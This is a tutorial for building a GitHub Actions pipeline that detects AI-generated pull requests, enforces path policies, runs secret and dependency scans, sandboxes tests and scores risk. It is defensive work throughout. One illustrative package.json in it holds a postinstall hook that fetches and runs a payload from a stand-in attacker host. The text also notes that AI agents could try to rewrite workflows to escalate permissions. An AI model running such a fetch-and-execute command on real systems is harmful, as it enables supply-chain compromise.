Lock Down AI Coding Agent Pipelines: Sandbox Configuration, Permission Boundaries, and Automated Review Gates
Before you begin
- GitHub Actions basics (creating and editing workflow YAML files)
- Familiarity with CI/CD concepts (pipelines, jobs, steps)
- Docker basics (building images, running containers)
- A GitHub repository where you can enable Actions
What you'll learn
- Detect AI-generated pull requests using commit metadata and labels
- Define a policy-as-code file that controls what AI agents can change
- Run automated security scans (secrets, dependencies, SAST) on every AI-generated PR
- Execute tests in an isolated Docker sandbox before merge
- Calculate a risk score and enforce tiered review requirements
- Emit structured audit events for compliance and incident response
This tutorial walks through setting up the ai-code-gate pipeline, a GitHub Actions workflow that detects AI-generated pull requests, enforces policy-as-code, runs security scans, executes tests in a sandbox, and gates merges by risk tier. For the broader strategy behind these controls, see the companion blog post: Securing AI Coding Agent Workflows.
The repository is modular: each pipeline stage is a standalone composite action you can adopt individually, and a shared TypeScript library (src/) contains the policy engine, detection logic, and risk scoring that the actions consume.
Step 1: Detect AI-Generated Pull Requests (10 min)
Before you can apply special controls, you need to know which pull requests came from an AI coding agent. Most agents leave fingerprints in commit metadata, author fields, or PR labels. This step builds a composite detection action that checks all three signals and sets an output flag the rest of the pipeline consumes.
Create the detection script
The script checks commit trailers for AI co-author patterns, known bot usernames, and PR labels. If any signal matches, it marks the PR as AI-generated and identifies the agent.
File: .github/actions/detect-ai-pr/detect.sh
#!/usr/bin/env bash
set -euo pipefail
IS_AI_PR="false"
AGENT_IDENTITY="none"
DETECTED_VIA="none"
# Check commit co-authors
COMMITS=$(git log --format="%B" origin/main..HEAD 2>/dev/null || git log --format="%B" -10)
check_co_author() {
  local pattern="$1"
  local agent="$2"
  if echo "$COMMITS" | grep -qi "Co-Authored-By:.*${pattern}"; then
    IS_AI_PR="true"
    AGENT_IDENTITY="$agent"
    DETECTED_VIA="co-author"
    return 0
  fi
  return 1
}
check_co_author "anthropic\|claude" "claude" ||
  check_co_author "copilot\|github" "copilot" ||
  check_co_author "cursor" "cursor" ||
  check_co_author "codex\|openai" "codex" ||
  check_co_author "cody\|sourcegraph" "cody" || true
# Check PR labels
if [ "$IS_AI_PR" = "false" ] && [ -n "${PR_LABELS:-}" ]; then
  IFS=',' read -ra LABELS <<< "$PR_LABELS"
  for label in "${LABELS[@]}"; do
    label_lower=$(echo "$label" | tr '[:upper:]' '[:lower:]')
    case "$label_lower" in
      ai-generated|copilot|claude|cursor|ai-code|bot)
        IS_AI_PR="true"
        DETECTED_VIA="label"
        case "$label_lower" in
          copilot) AGENT_IDENTITY="copilot" ;;
          claude) AGENT_IDENTITY="claude" ;;
          cursor) AGENT_IDENTITY="cursor" ;;
          *) AGENT_IDENTITY="unknown" ;;
        esac
        break
        ;;
    esac
  done
fi
# Check PR author
if [ "$IS_AI_PR" = "false" ] && [ -n "${PR_AUTHOR:-}" ]; then
  case "$PR_AUTHOR" in
    *\[bot\])
      IS_AI_PR="true"
      DETECTED_VIA="author"
      case "$PR_AUTHOR" in
        *copilot*) AGENT_IDENTITY="copilot" ;;
        *claude*) AGENT_IDENTITY="claude" ;;
        *) AGENT_IDENTITY="unknown-bot" ;;
      esac
      ;;
  esac
fi
echo "is_ai_pr=$IS_AI_PR" >> "$GITHUB_OUTPUT"
echo "agent_identity=$AGENT_IDENTITY" >> "$GITHUB_OUTPUT"
echo "::notice::AI PR Detection: is_ai_pr=$IS_AI_PR, agent=$AGENT_IDENTITY, via=$DETECTED_VIA"
The detection logic is also available as a TypeScript module in src/detect.ts with exported functions like detectFromCoAuthors, detectFromLabels, and detectFromAuthor. The shell script is used in the composite action for zero-dependency execution.
Create the composite action
File: .github/actions/detect-ai-pr/action.yml
name: "Detect AI-Generated PR"
description: "Identifies pull requests created by AI coding agents via commit metadata, labels, and author checks"
outputs:
  is_ai_pr:
    description: "Whether the PR was generated by an AI agent"
    value: ${{ steps.detect.outputs.is_ai_pr }}
  agent_identity:
    description: "The identified AI agent (claude, copilot, cursor, etc.)"
    value: ${{ steps.detect.outputs.agent_identity }}
runs:
  using: composite
  steps:
    - name: Detect AI PR
      id: detect
      shell: bash
      run: bash ${{ github.action_path }}/detect.sh
      env:
        PR_LABELS: ${{ join(github.event.pull_request.labels.*.name, ',') }}
        PR_AUTHOR: ${{ github.event.pull_request.user.login }}
The action reads PR_LABELS and PR_AUTHOR from environment variables set by the GitHub event context. No explicit inputs are needed because the action pulls everything from the event payload.
Claude Code adds a Co-Authored-By: Claude trailer to every commit by default. GitHub Copilot agent PRs come from dedicated bot accounts. Cursor and Aider typically include tool identifiers in commit messages. Checking all three signals gives you broad coverage and keeps false negatives rare.
If your team uses a different AI coding tool, add its commit signature to the check_co_author calls in detect.sh and to the AI_AGENT_PATTERNS map in src/detect.ts. The pattern is the same: look for co-author trailers, bot authors, or labels.
To verify this step works, push a commit with Co-Authored-By: Claude <noreply@anthropic.com> in the trailer and check the action output. The is_ai_pr output should be true and agent_identity should be claude.
Step 2: Define Your Policy File (10 min)
Policy-as-code is the foundation for everything else. Instead of relying on ad hoc review decisions, you define what AI agents are allowed to change, what they must never touch, and how much review different risk levels require. The policy file lives in the repo root so it is versioned alongside the code it governs.
Create the policy file
File: .ai-code-gate.yml
detection:
  labels: ["ai-generated", "copilot", "claude"]
  co_authors: ["*[bot]@*", "*noreply@anthropic.com"]
policy:
  allowed_patterns:
    - "src/**/*.ts"
    - "src/**/*.tsx"
    - "tests/**"
    - "docs/**"
  blocked_patterns:
    - "*.env*"
    - "**/auth/**"
    - "docker-compose*.yml"
    - ".github/workflows/**"
  scope_limits:
    max_files: 20
    max_lines_added: 500
review:
  risk_tiers:
    low:
      threshold: 30
      approvals: 0
      auto_merge: true
    medium:
      threshold: 70
      approvals: 1
    high:
      threshold: 100
      approvals: 2
      require_security_team: true
audit:
  enabled: true
  output_format: json
  retention_days: 90
Understand each section
The detection block defines which PR labels and co-author patterns signal an AI-generated PR. allowed_patterns and blocked_patterns use minimatch glob syntax to define what an AI agent can and cannot touch. If a PR modifies a file matching a blocked pattern, the pipeline fails immediately. scope_limits prevent an AI agent from submitting massive PRs that are difficult to review meaningfully: max_files caps the number of changed files and max_lines_added caps the total additions. The review.risk_tiers section maps risk score ranges to approval requirements. The audit section controls structured event logging and artifact retention.
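As a concrete illustration of how scope limits behave, here is a minimal TypeScript sketch. The names and shapes here are illustrative only; the canonical check lives in src/policy.ts.

```typescript
// Illustrative sketch of scope_limits enforcement (assumed names;
// the real implementation is in src/policy.ts).
const limits = { max_files: 20, max_lines_added: 500 };

function scopeExceeded(files: { path: string; additions: number }[]): boolean {
  const totalAdded = files.reduce((sum, f) => sum + f.additions, 0);
  return files.length > limits.max_files || totalAdded > limits.max_lines_added;
}

// A 3-file PR adding 600 lines exceeds max_lines_added even though
// the file count is well within bounds.
const files = [
  { path: "src/a.ts", additions: 200 },
  { path: "src/b.ts", additions: 250 },
  { path: "src/c.ts", additions: 150 },
];
console.log(scopeExceeded(files)); // true: 600 > 500
```

Either limit tripping on its own is enough to flag the PR, which keeps AI-generated diffs small enough for meaningful human review.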
The policy file is validated at runtime using a Zod schema (src/policy.ts) that provides defaults for every field. You can start with just a policy block and the rest fills in with sensible defaults.
Block CI/CD configuration files by default. An AI agent that can modify workflow YAML can potentially escalate its own permissions or disable the gates you are building here.
The repository includes three example configurations in the examples/ directory: a balanced default, a minimal evaluation config, and a strict regulated-environment config. You can also validate your policy file against the included JSON schema by running npx ajv validate -s schema/ai-code-gate.schema.json -d .ai-code-gate.yml.
Step 3: Run Policy Checks (10 min)
The policy check action reads the list of changed files from the GitHub API, compares every file against the allowed and blocked patterns, enforces scope limits, and writes a structured result for downstream steps.
The shared policy engine
The TypeScript policy engine lives in src/policy.ts and is imported by the composite action. It exports two key functions:
- loadPolicyFromString(content): parses YAML and validates it against the Zod schema, returning a typed Policy object with all defaults filled in
- validateDiff(policy, changedFiles): checks each changed file against allowed/blocked patterns and scope limits, returning a ValidationResult with a passed boolean and a violations array
Each violation has a type (blocked_pattern, disallowed_file, or scope_exceeded), an optional file and pattern, and a human-readable message.
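To make those shapes concrete, here is an illustrative TypeScript sketch of a violation and result. These are assumed shapes for illustration; src/policy.ts holds the canonical type definitions.

```typescript
// Illustrative shapes only; the canonical types live in src/policy.ts.
type Violation = {
  type: "blocked_pattern" | "disallowed_file" | "scope_exceeded";
  file?: string;
  pattern?: string;
  message: string;
};

type ValidationResult = {
  passed: boolean;
  violations: Violation[];
};

// The kind of result a blocked-pattern hit might produce:
const result: ValidationResult = {
  passed: false,
  violations: [
    {
      type: "blocked_pattern",
      file: ".env.local",
      pattern: "*.env*",
      message: 'File ".env.local" matches blocked pattern "*.env*"',
    },
  ],
};
console.log(result.violations[0].message);
```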
Create the policy check action
The composite action fetches the list of changed files from the GitHub Pull Request API, then runs them through the policy engine.
File: .github/actions/policy-check/check.ts
import { readFileSync, appendFileSync, existsSync } from "node:fs";
import { loadPolicyFromString, validateDiff, type ChangedFile } from "../../../src/policy.js";
const GITHUB_OUTPUT = process.env.GITHUB_OUTPUT ?? "";
const PR_NUMBER = process.env.PR_NUMBER ?? "";
const REPO = process.env.REPO ?? "";
const GITHUB_TOKEN = process.env.GITHUB_TOKEN ?? "";
async function getPrFiles(): Promise<ChangedFile[]> {
  const response = await fetch(
    `https://api.github.com/repos/${REPO}/pulls/${PR_NUMBER}/files`,
    {
      headers: {
        Authorization: `Bearer ${GITHUB_TOKEN}`,
        Accept: "application/vnd.github.v3+json",
      },
    },
  );
  if (!response.ok) {
    throw new Error(`Failed to fetch PR files: ${response.status}`);
  }
  const files = (await response.json()) as Array<{
    filename: string;
    additions: number;
  }>;
  return files.map((f) => ({ path: f.filename, additions: f.additions }));
}

async function main() {
  const policyPath = ".ai-code-gate.yml";
  if (!existsSync(policyPath)) {
    console.log("No .ai-code-gate.yml found, using default policy");
    appendFileSync(GITHUB_OUTPUT, "policy_passed=true\n");
    appendFileSync(GITHUB_OUTPUT, "violations_json=[]\n");
    return;
  }
  const policyContent = readFileSync(policyPath, "utf-8");
  const policy = loadPolicyFromString(policyContent);
  const changedFiles = await getPrFiles();
  console.log(`Checking ${changedFiles.length} files against policy...`);
  const result = validateDiff(policy, changedFiles);
  appendFileSync(GITHUB_OUTPUT, `policy_passed=${result.passed}\n`);
  appendFileSync(GITHUB_OUTPUT, `violations_json=${JSON.stringify(result.violations)}\n`);
  if (!result.passed) {
    console.log(`::warning::Policy check failed with ${result.violations.length} violation(s)`);
    for (const v of result.violations) {
      console.log(`  - ${v.message}`);
    }
  } else {
    console.log("Policy check passed");
  }
}

main().catch((err) => {
  console.error(err);
  process.exit(1);
});
File: .github/actions/policy-check/action.yml
name: "Policy Check"
description: "Validates PR changes against the .ai-code-gate.yml policy file"
outputs:
  policy_passed:
    description: "Whether all policy checks passed"
    value: ${{ steps.check.outputs.policy_passed }}
  violations_json:
    description: "JSON array of policy violations"
    value: ${{ steps.check.outputs.violations_json }}
runs:
  using: composite
  steps:
    - name: Run policy check
      id: check
      shell: bash
      run: npx tsx ${{ github.action_path }}/check.ts
      env:
        GITHUB_TOKEN: ${{ env.GITHUB_TOKEN }}
        PR_NUMBER: ${{ github.event.pull_request.number }}
        REPO: ${{ github.repository }}
Notice that the action fetches the file list from the GitHub API instead of parsing git diff output. This is more reliable because the API returns the canonical list of changed files for the PR, regardless of local checkout depth. The shared src/policy.ts module handles all pattern matching via minimatch with the dot: true option so dotfiles like .env are matched correctly.
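To build intuition for the glob semantics, here is a deliberately simplified matcher written only for illustration; the real engine delegates to the minimatch library rather than hand-rolling regexes. One behavioral difference worth noting: this naive version matches dotfiles by default, whereas minimatch needs { dot: true } for that.

```typescript
// Hypothetical, simplified glob-to-regex converter for illustration only.
// The actual policy engine uses minimatch with { dot: true }.
function globToRegExp(pattern: string): RegExp {
  let re = "";
  let i = 0;
  while (i < pattern.length) {
    if (pattern.startsWith("**/", i)) {
      re += "(?:.*/)?"; // "**/" matches any directory prefix, or none
      i += 3;
    } else if (pattern.startsWith("**", i)) {
      re += ".*"; // "**" matches anything, including "/"
      i += 2;
    } else if (pattern[i] === "*") {
      re += "[^/]*"; // "*" stays within a single path segment
      i += 1;
    } else {
      re += pattern[i].replace(/[.+^${}()|[\]\\]/g, "\\$&"); // escape regex chars
      i += 1;
    }
  }
  return new RegExp(`^${re}$`);
}

const blocked = ["*.env*", "**/auth/**", ".github/workflows/**"];
const isBlocked = (path: string): boolean =>
  blocked.some((p) => globToRegExp(p).test(path));

console.log(isBlocked(".env.production"));          // true: "*.env*"
console.log(isBlocked("src/auth/session.ts"));      // true: "**/auth/**"
console.log(isBlocked(".github/workflows/ci.yml")); // true: ".github/workflows/**"
console.log(isBlocked("src/utils/math.ts"));        // false
```

The dot: true option matters precisely for cases like .env.production: without it, minimatch refuses to let "*.env*" match a name that begins with a dot.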
Policy violations are logged as GitHub Actions warnings so reviewers see exactly which files and rules triggered the failure without digging through workflow logs.
To verify this step, modify a blocked file such as .github/workflows/release.yml in an AI-generated PR and observe the policy check failure in the action output.
Step 4: Run Automated Security Scanning (10 min)
Every AI-generated PR gets scanned for leaked secrets, vulnerable dependencies, and common code vulnerabilities. The scan orchestration script runs each tool if available, collects results, and produces pass/fail outputs for the risk assessment step.
Create the scan orchestration script
File: .github/actions/security-scan/scan.sh
#!/usr/bin/env bash
set -uo pipefail
FINDINGS=0
SCAN_PASSED="true"
RESULTS_DIR="$(mktemp -d)"
echo "=== AI Code Gate Security Scan ==="
# --- Gitleaks ---
echo ""
echo "--- Running Gitleaks ---"
if command -v gitleaks &>/dev/null; then
  gitleaks detect --source=. --no-git --report-format=json --report-path="$RESULTS_DIR/gitleaks.json" 2>&1 || true
  if [ -f "$RESULTS_DIR/gitleaks.json" ]; then
    GL_COUNT=$(jq 'length' "$RESULTS_DIR/gitleaks.json" 2>/dev/null || echo "0")
    FINDINGS=$((FINDINGS + GL_COUNT))
    if [ "$GL_COUNT" -gt 0 ]; then
      SCAN_PASSED="false"
      echo "::warning::Gitleaks found $GL_COUNT secret(s)"
    else
      echo "Gitleaks: clean"
    fi
  fi
else
  echo "Gitleaks not installed, skipping (install: https://github.com/gitleaks/gitleaks)"
fi
# --- Semgrep ---
echo ""
echo "--- Running Semgrep ---"
if command -v semgrep &>/dev/null; then
  semgrep scan --config=auto --json --output="$RESULTS_DIR/semgrep.json" 2>&1 || true
  if [ -f "$RESULTS_DIR/semgrep.json" ]; then
    SG_COUNT=$(jq '.results | length' "$RESULTS_DIR/semgrep.json" 2>/dev/null || echo "0")
    FINDINGS=$((FINDINGS + SG_COUNT))
    if [ "$SG_COUNT" -gt 0 ]; then
      SCAN_PASSED="false"
      echo "::warning::Semgrep found $SG_COUNT finding(s)"
    else
      echo "Semgrep: clean"
    fi
  fi
else
  echo "Semgrep not installed, skipping (install: https://semgrep.dev/docs/getting-started/)"
fi
# --- Dependency Audit ---
echo ""
echo "--- Running Dependency Audit ---"
if [ -f "package-lock.json" ] || [ -f "package.json" ]; then
  npm audit --json > "$RESULTS_DIR/npm-audit.json" 2>&1 || true
  if [ -f "$RESULTS_DIR/npm-audit.json" ]; then
    VULN_COUNT=$(jq '.metadata.vulnerabilities.total // 0' "$RESULTS_DIR/npm-audit.json" 2>/dev/null || echo "0")
    FINDINGS=$((FINDINGS + VULN_COUNT))
    if [ "$VULN_COUNT" -gt 0 ]; then
      echo "::warning::npm audit found $VULN_COUNT vulnerability(ies)"
    else
      echo "npm audit: clean"
    fi
  fi
elif [ -f "requirements.txt" ] || [ -f "Pipfile" ]; then
  if command -v pip-audit &>/dev/null; then
    pip-audit --format=json --output="$RESULTS_DIR/pip-audit.json" 2>&1 || true
  else
    echo "pip-audit not installed, skipping"
  fi
fi
echo ""
echo "=== Scan Summary ==="
echo "Total findings: $FINDINGS"
echo "Scan passed: $SCAN_PASSED"
echo "scan_passed=$SCAN_PASSED" >> "$GITHUB_OUTPUT"
echo "findings_count=$FINDINGS" >> "$GITHUB_OUTPUT"
The script gracefully skips tools that are not installed on the runner using command -v checks. This means you can start using the action immediately and add tools incrementally: install gitleaks first, then Semgrep when you are ready, and the script adapts without failing. Each tool’s results are written to a temporary directory and counts are aggregated into a single findings_count output.
Create the scan action
File: .github/actions/security-scan/action.yml
name: "Security Scan"
description: "Runs gitleaks, Semgrep, and dependency audit scans on the PR"
outputs:
  scan_passed:
    description: "Whether all security scans passed"
    value: ${{ steps.scan.outputs.scan_passed }}
  findings_count:
    description: "Total number of security findings"
    value: ${{ steps.scan.outputs.findings_count }}
runs:
  using: composite
  steps:
    - name: Run security scans
      id: scan
      shell: bash
      run: bash ${{ github.action_path }}/scan.sh
The action itself is minimal: it delegates everything to scan.sh. There are no explicit install steps because the script handles missing tools gracefully. If you want gitleaks and Semgrep pre-installed on your runners, add installation steps to your workflow or use a custom runner image.
Secret detection is critical because a leaked key in an AI-generated PR can be exploited before any human reviewer opens the diff. Even a single secret finding sets scan_passed=false and contributes heavily to the risk score.
The dependency audit automatically detects whether the project uses npm or pip. For Node.js projects, it runs npm audit. For Python projects, it uses pip-audit if available.
To verify this step, add a hardcoded API key like const API_KEY = "sk-live-abc123def456ghi789" to a source file in an AI-generated PR and observe gitleaks catching it in the scan output.
Step 5: Execute Tests in a Sandbox (10 min)
Running tests from AI-generated code on bare runners is risky. The code might make network calls, write to shared filesystems, or consume unbounded resources. This step builds and runs tests inside a Docker container with network disabled and CPU and memory capped.
Create the sandbox Dockerfile
File: .github/actions/sandbox-test/Dockerfile
FROM node:20-slim
WORKDIR /app
# Copy package files first for layer caching
COPY package.json package-lock.json* ./
RUN npm ci --ignore-scripts 2>/dev/null || npm install --ignore-scripts
# Copy source
COPY . .
# Run tests (network will be disabled at runtime via --network=none)
CMD ["npm", "test"]
The --ignore-scripts flag prevents lifecycle scripts from running during install, which blocks a common supply-chain attack vector where a compromised dependency executes arbitrary code at install time. Network isolation is enforced at the Docker runtime level, not in the Dockerfile.
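For context, the attack that --ignore-scripts neutralizes looks something like this hypothetical package.json from a compromised dependency (the package name and URL are invented for illustration):

```json
{
  "name": "compromised-dep",
  "version": "4.2.1",
  "scripts": {
    "postinstall": "curl -s https://attacker.example/payload.sh | sh"
  }
}
```

With --ignore-scripts, npm still installs the package contents but never executes the postinstall hook, so the payload never runs on your runner.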
Create the sandbox test action
File: .github/actions/sandbox-test/action.yml
name: "Sandboxed Test Execution"
description: "Builds and runs tests in an isolated Docker container with network and resource restrictions"
outputs:
  tests_passed:
    description: "Whether all tests passed in the sandbox"
    value: ${{ steps.sandbox.outputs.tests_passed }}
  test_output:
    description: "Test execution output"
    value: ${{ steps.sandbox.outputs.test_output }}
runs:
  using: composite
  steps:
    - name: Build sandbox image
      shell: bash
      run: docker build -t ai-code-gate-sandbox -f ${{ github.action_path }}/Dockerfile .
    - name: Run tests in sandbox
      id: sandbox
      shell: bash
      run: |
        set +e
        OUTPUT=$(docker run \
          --network=none \
          --memory=512m \
          --cpus=1 \
          --rm \
          ai-code-gate-sandbox 2>&1)
        EXIT_CODE=$?
        set -e
        echo "test_output<<EOF" >> "$GITHUB_OUTPUT"
        echo "$OUTPUT" >> "$GITHUB_OUTPUT"
        echo "EOF" >> "$GITHUB_OUTPUT"
        if [ $EXIT_CODE -eq 0 ]; then
          echo "tests_passed=true" >> "$GITHUB_OUTPUT"
          echo "Sandbox tests passed"
        else
          echo "tests_passed=false" >> "$GITHUB_OUTPUT"
          echo "::warning::Sandbox tests failed (exit code $EXIT_CODE)"
        fi
        echo "$OUTPUT"
The --network=none flag prevents any outbound connections. The --memory=512m and --cpus=1 flags cap resource usage so AI-generated code cannot consume unbounded runner resources. The --rm flag removes the container after execution. The test output is captured as an action output so the risk assessment step can reference it.
The sandbox runs the repository’s existing npm test command. The sample-app/ directory in the ai-code-gate repository contains a minimal Express API with health and items endpoints that demonstrates the pipeline end to end.
To verify this step, push a failing test in an AI-generated PR and observe the tests_passed=false output. The full test output is available in the action log.
Step 6: Calculate Risk and Enforce Review Gates (5 min)
Risk assessment combines signals from the policy check, security scans, and test results into a single score. The score maps to a review tier that controls how many approvals are required before the PR can merge.
The shared risk engine
The risk scoring logic lives in src/risk.ts and uses a weighted, additive model with per-category caps:
| Category | Points per finding | Cap |
|---|---|---|
| Policy violations | +30 per violation | 40 |
| Secret findings | +50 per finding | 50 |
| Dependency vulnerabilities (critical) | +40 each | 50 (combined) |
| Dependency vulnerabilities (high) | +25 each | 50 (combined) |
| Dependency vulnerabilities (moderate) | +15 each | 50 (combined) |
| Dependency vulnerabilities (low) | +5 each | 50 (combined) |
| SAST errors | +20 each | 40 (combined) |
| SAST warnings | +10 each | 40 (combined) |
| Test failures | +30 | 30 |
| Scope exceeded | +20 | 20 |
The total score is capped at 100. The calculateRiskScore function returns a RiskResult with the numeric score, the tier (LOW, MEDIUM, or HIGH), and a full breakdown by category.
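As a sketch of the model, here is a simplified TypeScript version covering a subset of the categories from the table above. It is illustrative only; src/risk.ts is the canonical implementation, and the names here are invented.

```typescript
// Simplified sketch of the capped additive scoring model (subset of
// categories; illustrative names, not the src/risk.ts API).
const capAt = (points: number, max: number): number => Math.min(points, max);

interface SimpleInputs {
  policyViolations: number;
  secretFindings: number;
  testsFailed: boolean;
  scopeExceeded: boolean;
}

function simpleRiskScore(inputs: SimpleInputs): number {
  const policy = capAt(inputs.policyViolations * 30, 40); // +30 each, cap 40
  const secrets = capAt(inputs.secretFindings * 50, 50);  // +50 each, cap 50
  const tests = inputs.testsFailed ? 30 : 0;              // flat +30
  const scope = inputs.scopeExceeded ? 20 : 0;            // flat +20
  return Math.min(policy + secrets + tests + scope, 100); // overall cap
}

function tierFor(score: number): "LOW" | "MEDIUM" | "HIGH" {
  if (score <= 30) return "LOW";
  if (score <= 70) return "MEDIUM";
  return "HIGH";
}

// One leaked secret (50) plus failing tests (30) scores 80 -> HIGH tier.
const score = simpleRiskScore({
  policyViolations: 0,
  secretFindings: 1,
  testsFailed: true,
  scopeExceeded: false,
});
console.log(score, tierFor(score)); // 80 HIGH
```

The per-category caps keep any single noisy scanner from saturating the score on its own, while the overall cap keeps the scale bounded at 100.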
Create the risk assessment action
The composite action takes inputs from the upstream jobs (policy, scan, sandbox), runs them through the risk engine, and posts a formatted PR comment.
File: .github/actions/risk-assessment/assess.ts
import { writeFileSync, appendFileSync } from "node:fs";
import { calculateRiskScore, formatRiskComment, type RiskInputs } from "../../../src/risk.js";
const GITHUB_OUTPUT = process.env.GITHUB_OUTPUT ?? "";
const POLICY_PASSED = process.env.POLICY_PASSED === "true";
const SCAN_PASSED = process.env.SCAN_PASSED === "true";
const FINDINGS_COUNT = parseInt(process.env.FINDINGS_COUNT ?? "0", 10);
const TESTS_PASSED = process.env.TESTS_PASSED === "true";
const VIOLATIONS_JSON = process.env.VIOLATIONS_JSON ?? "[]";
const GITHUB_TOKEN = process.env.GITHUB_TOKEN ?? "";
const PR_NUMBER = process.env.PR_NUMBER ?? "";
const REPO = process.env.REPO ?? "";
async function postComment(body: string) {
  if (!GITHUB_TOKEN || !PR_NUMBER || !REPO) {
    console.log("Skipping PR comment (missing GitHub context)");
    return;
  }
  const response = await fetch(
    `https://api.github.com/repos/${REPO}/issues/${PR_NUMBER}/comments`,
    {
      method: "POST",
      headers: {
        Authorization: `Bearer ${GITHUB_TOKEN}`,
        Accept: "application/vnd.github.v3+json",
        "Content-Type": "application/json",
      },
      body: JSON.stringify({ body }),
    },
  );
  if (!response.ok) {
    console.error(`Failed to post PR comment: ${response.status}`);
  }
}

async function main() {
  let violations: unknown[] = [];
  try {
    violations = JSON.parse(VIOLATIONS_JSON);
  } catch {
    violations = [];
  }
  const inputs: RiskInputs = {
    policyViolations: POLICY_PASSED ? 0 : violations.length || 1,
    scanFindings: {
      secrets: SCAN_PASSED ? 0 : Math.max(FINDINGS_COUNT, 1),
      dependencies: { low: 0, moderate: 0, high: 0, critical: 0 },
      sast: { warnings: 0, errors: 0 },
    },
    testsPassed: TESTS_PASSED,
    scopeExceeded: false,
  };
  const result = calculateRiskScore(inputs);
  const comment = formatRiskComment(result);
  console.log(`Risk Score: ${result.score}/100`);
  console.log(`Risk Tier: ${result.tier}`);
  // Write outputs
  appendFileSync(GITHUB_OUTPUT, `risk_score=${result.score}\n`);
  appendFileSync(GITHUB_OUTPUT, `risk_tier=${result.tier}\n`);
  // Write audit event
  const auditEvent = {
    timestamp: new Date().toISOString(),
    event: "risk-assessment",
    pr_number: PR_NUMBER,
    repository: REPO,
    risk_score: result.score,
    risk_tier: result.tier,
    breakdown: result.breakdown,
    policy_passed: POLICY_PASSED,
    scan_passed: SCAN_PASSED,
    tests_passed: TESTS_PASSED,
    findings_count: FINDINGS_COUNT,
    violations_count: violations.length,
  };
  writeFileSync("audit-event.json", JSON.stringify(auditEvent, null, 2));
  // Post PR comment
  await postComment(comment);
}

main().catch((err) => {
  console.error(err);
  process.exit(1);
});
File: .github/actions/risk-assessment/action.yml
name: "Risk Assessment"
description: "Calculates risk score from pipeline results and posts a formatted PR comment"
inputs:
  policy_passed:
    description: "Whether policy checks passed"
    required: true
  scan_passed:
    description: "Whether security scans passed"
    required: true
  findings_count:
    description: "Number of security findings"
    required: true
  tests_passed:
    description: "Whether sandbox tests passed"
    required: true
  violations_json:
    description: "JSON array of policy violations"
    required: false
    default: "[]"
outputs:
  risk_score:
    description: "Calculated risk score (0-100)"
    value: ${{ steps.assess.outputs.risk_score }}
  risk_tier:
    description: "Risk tier (LOW, MEDIUM, HIGH)"
    value: ${{ steps.assess.outputs.risk_tier }}
runs:
  using: composite
  steps:
    - name: Calculate risk
      id: assess
      shell: bash
      run: npx tsx ${{ github.action_path }}/assess.ts
      env:
        POLICY_PASSED: ${{ inputs.policy_passed }}
        SCAN_PASSED: ${{ inputs.scan_passed }}
        FINDINGS_COUNT: ${{ inputs.findings_count }}
        TESTS_PASSED: ${{ inputs.tests_passed }}
        VIOLATIONS_JSON: ${{ inputs.violations_json }}
        GITHUB_TOKEN: ${{ env.GITHUB_TOKEN }}
        PR_NUMBER: ${{ github.event.pull_request.number }}
        REPO: ${{ github.repository }}
The action takes all upstream results as explicit inputs so it works in a parallel-job workflow where each upstream job runs independently. The formatRiskComment function from src/risk.ts generates a PR comment with a score breakdown table.
The three tiers work as follows. LOW (0-30): the PR auto-merges because scans are clean, tests pass, and the diff is small. MEDIUM (31-70): at least one human reviewer must approve before merge. HIGH (71-100): two reviewers are required and one must be from the security team.
The risk score is additive with per-category caps. A single leaked secret (50 points) plus failing tests (30 points) lands at 80, well into the HIGH tier. This ensures that any combination of serious findings triggers the strictest review tier.
To verify this step, check the PR comment for the risk score and tier. A clean PR with passing tests should show a LOW tier.
Step 7: Wire Up the Workflow and Audit Logging (5 min)
The top-level workflow connects all five composite actions into a parallel-job pipeline. Policy checks, security scans, and sandbox tests run concurrently after detection. Risk assessment runs last, after all upstream jobs complete, using always() so it runs even if an upstream job fails.
Create the workflow
File: .github/workflows/ai-code-gate.yml
name: AI Code Gate
on:
  pull_request:
    types: [opened, synchronize, reopened]
permissions:
  contents: read
  pull-requests: write
  issues: write
jobs:
  detect:
    name: Detect AI-Generated PR
    runs-on: ubuntu-latest
    outputs:
      is_ai_pr: ${{ steps.detect.outputs.is_ai_pr }}
      agent_identity: ${{ steps.detect.outputs.agent_identity }}
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0
      - uses: ./.github/actions/detect-ai-pr
        id: detect
      - run: echo "AI PR detected=${{ steps.detect.outputs.is_ai_pr }}, agent=${{ steps.detect.outputs.agent_identity }}"
  policy-check:
    name: Policy Check
    needs: detect
    if: needs.detect.outputs.is_ai_pr == 'true'
    runs-on: ubuntu-latest
    outputs:
      policy_passed: ${{ steps.policy.outputs.policy_passed }}
      violations_json: ${{ steps.policy.outputs.violations_json }}
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@v4
        with:
          node-version: "20"
      - run: npm ci
      - uses: ./.github/actions/policy-check
        id: policy
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
  security-scan:
    name: Security Scan
    needs: detect
    if: needs.detect.outputs.is_ai_pr == 'true'
    runs-on: ubuntu-latest
    outputs:
      scan_passed: ${{ steps.scan.outputs.scan_passed }}
      findings_count: ${{ steps.scan.outputs.findings_count }}
    steps:
      - uses: actions/checkout@v4
      - uses: ./.github/actions/security-scan
        id: scan
  sandbox-test:
    name: Sandboxed Test Execution
    needs: detect
    if: needs.detect.outputs.is_ai_pr == 'true'
    runs-on: ubuntu-latest
    outputs:
      tests_passed: ${{ steps.sandbox.outputs.tests_passed }}
    steps:
      - uses: actions/checkout@v4
      - uses: ./.github/actions/sandbox-test
        id: sandbox
  risk-assessment:
    name: Risk Assessment
    needs: [detect, policy-check, security-scan, sandbox-test]
    if: always() && needs.detect.outputs.is_ai_pr == 'true'
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@v4
        with:
          node-version: "20"
      - run: npm ci
      - uses: ./.github/actions/risk-assessment
        id: assess
        with:
          policy_passed: ${{ needs.policy-check.outputs.policy_passed || 'false' }}
          scan_passed: ${{ needs.security-scan.outputs.scan_passed || 'false' }}
          findings_count: ${{ needs.security-scan.outputs.findings_count || '0' }}
          tests_passed: ${{ needs.sandbox-test.outputs.tests_passed || 'false' }}
          violations_json: ${{ needs.policy-check.outputs.violations_json || '[]' }}
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
      - name: Upload audit log
        uses: actions/upload-artifact@v4
        with:
          name: ai-code-gate-audit
          path: audit-event.json
          retention-days: 90
Key architectural decisions
Parallel jobs over sequential steps. Policy checks, security scans, and sandbox tests all depend only on the detect job, so they run concurrently. This cuts wall-clock time significantly for AI-generated PRs compared to a sequential pipeline.
